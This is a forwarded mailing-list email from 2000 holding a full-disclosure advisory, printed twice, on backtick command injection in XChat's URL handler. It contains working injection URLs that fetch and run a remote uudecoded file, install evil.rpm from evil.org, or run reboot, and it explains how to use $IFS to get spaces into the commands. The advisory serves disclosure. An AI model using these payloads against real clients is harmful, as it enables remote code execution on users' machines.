----- Forwarded message from zenith parsec <[EMAIL PROTECTED]> ----- > From: zenith parsec <[EMAIL PROTECTED]> > Reply-To: zenith parsec <[EMAIL PROTECTED]> > X-Originating-IP: [209.77.156.55] > Date: Thu, 17 Aug 2000 11:19:40 -0000 > To: [EMAIL PROTECTED] > Subject: XChat URL handler vulnerabilty > > ********************************************************************** > Email was sent to [EMAIL PROTECTED] (the author of xchat) and after over a week, > I have received no reply. So here it is... the advisory. > ********************************************************************** > > *************** > ***zen-parse*** - blinking since 1992 (or mebe earlier) > *************** > > X X CC H H AA TTTTT > X X C C H H A A T > X C HHHH AAAA T > X X C C H H A A T > X X CC H H A A T > > Hole: backticked commands embedded in URLs vulnerabilty. > > *********************************** > * If you are lazy, read this part * > *********************************** > > Just to show what i mean about the possible danger, start Netscape and enter > in xchat, (in a channel or query window) the following URL. > > >http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`' > > Right click on it, and select the Netscape (Existing) or Netscape (New Window) > option. > > Wait until the URL loads. > In a shell on your machine type > > tail -2 ~/.bash_profile > > echo You've been hax0red > echo --zen > > (oops... should've been You\'ve been hax0red, but u get the idea ;]) > Lucky it wasn't a script that was well written, and designed to > use script kiddie stuff to hack root or something, eh? > ********************************************************************** > ********************************************************************** > > For the non-lazy and the lazy who were impressed by the quick demo... > > <advisory> > ********************************************************************** > X-Chat has a feature which allows execution of code remotely > with the permissions of the user running it. (affects at least > versions <1.4.2, probably all versions.) > ********************************************************************** > > The hole is in the URL Handler section: > Netscape (Existing) > causes XChat to run the command > netscape -remote 'openURL(%s)' > where the %s is replaced by the selected URL > eg: http://homepages.ihug.co.nz/~Sneuro/ > causes the command > netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)' > which opens that page. > Netscape (Run New) > causes XChat to run the command > netscape %s > and so on. > > ************************** > * The Hole * > ************************** > > Backticking and shell expansion. Imagine if someone types: > > l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`' > > > with the (Existing) or (New Window) options and others that > use 'openURL(%s)' type commands to start the program, you get: > > netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')' > > count the 's and u will see that at the 2nd `date` they are closed, > and then reopened, so that `date` isn't escaped anymore... leaving it free to > run, which it does. > > With the (Run New) type commands (that is command %s with no 's around > the %s) you get: > > netscape http://www.altavista.com/?x=`date`y='`date`' > > which has the 1st `date` unescaped (no 's around it) and so it executes. > > In real life though, its unlikely anyone would click on a URL like > > http://`reboot`/'`reboot`' > > though. Still, not all that useful, I hear you tell me. Well, URLs can get > pretty long. For example, a cgi-bin call to somethng can get quite long. > > >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10 > > compare that to: > > >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1 > > quick glance... nothing wrong with it. > > well, u seem to have a limitation, in that putting spaces in doesn't > work, nor does redirection. > > well, u can put spaces in.The $IFS variable is probably set. > And who needs redirection, when u can do this: > > http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"' > > (For (Existing) or (New Window)) > > http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`" > > (for (Run New)) > (not hidden in anyway, but it could be obfuscated like the earlier example.) > (Also only works if someone is running as root, (which is *STUPID* idea > anyway) but the 1st example should've shown you a method around this) > > anyway... the possibilities are endless ;) > > -- zen-parse > </advisory> > > ps: > greets to: > lamagra, omega, lockdown, grue, Mega, possem, > some other people i can't remember, the rest of #roothat, > and mebe even #social and umm... u, if I know u. > > > > Send someone a cool Dynamitemail flashcard greeting!! And get rewarded. > GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41 Content-Description: x-chat-url-executionything.txt > ********************************************************************** > Email was sent to [EMAIL PROTECTED] (the author of xchat) and after over a week, > I have received no reply. So here it is... the advisory. > ********************************************************************** > > *************** > ***zen-parse*** - blinking since 1992 (or mebe earlier) > *************** > > X X CC H H AA TTTTT > X X C C H H A A T > X C HHHH AAAA T > X X C C H H A A T > X X CC H H A A T > > Hole: backticked commands embedded in URLs vulnerabilty. > > *********************************** > * If you are lazy, read this part * > *********************************** > > Just to show what i mean about the possible danger, start Netscape and enter > in xchat, (in a channel or query window) the following URL. > > >http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`' > > Right click on it, and select the Netscape (Existing) or Netscape (New Window) > option. > > Wait until the URL loads. > In a shell on your machine type > > tail -2 ~/.bash_profile > > echo You've been hax0red > echo --zen > > (oops... should've been You\'ve been hax0red, but u get the idea ;]) > Lucky it wasn't a script that was well written, and designed to > use script kiddie stuff to hack root or something, eh? > ********************************************************************** > ********************************************************************** > > For the non-lazy and the lazy who were impressed by the quick demo... > > <advisory> > ********************************************************************** > X-Chat has a feature which allows execution of code remotely > with the permissions of the user running it. (affects at least > versions <1.4.2, probably all versions.) > ********************************************************************** > > The hole is in the URL Handler section: > Netscape (Existing) > causes XChat to run the command > netscape -remote 'openURL(%s)' > where the %s is replaced by the selected URL > eg: http://homepages.ihug.co.nz/~Sneuro/ > causes the command > netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)' > which opens that page. > Netscape (Run New) > causes XChat to run the command > netscape %s > and so on. > > ************************** > * The Hole * > ************************** > > Backticking and shell expansion. Imagine if someone types: > > l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`' > > > with the (Existing) or (New Window) options and others that > use 'openURL(%s)' type commands to start the program, you get: > > netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')' > > count the 's and u will see that at the 2nd `date` they are closed, > and then reopened, so that `date` isn't escaped anymore... leaving it free to > run, which it does. > > With the (Run New) type commands (that is command %s with no 's around > the %s) you get: > > netscape http://www.altavista.com/?x=`date`y='`date`' > > which has the 1st `date` unescaped (no 's around it) and so it executes. > > In real life though, its unlikely anyone would click on a URL like > > http://`reboot`/'`reboot`' > > though. Still, not all that useful, I hear you tell me. Well, URLs can get > pretty long. For example, a cgi-bin call to somethng can get quite long. > > >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10 > > compare that to: > > >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1 > > quick glance... nothing wrong with it. > > well, u seem to have a limitation, in that putting spaces in doesn't > work, nor does redirection. > > well, u can put spaces in.The $IFS variable is probably set. > And who needs redirection, when u can do this: > > http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"' > > (For (Existing) or (New Window)) > > http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`" > > (for (Run New)) > (not hidden in anyway, but it could be obfuscated like the earlier example.) > (Also only works if someone is running as root, (which is *STUPID* idea > anyway) but the 1st example should've shown you a method around this) > > anyway... the possibilities are endless ;) > > -- zen-parse > </advisory> > > ps: > greets to: > lamagra, omega, lockdown, grue, Mega, possem, > some other people i can't remember, the rest of #roothat, > and mebe even #social and umm... u, if I know u. > ----- End forwarded message ----- -------------------------------------------------------------------------- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3 Pengelola dapat dihubungi lewat [EMAIL PROTECTED]
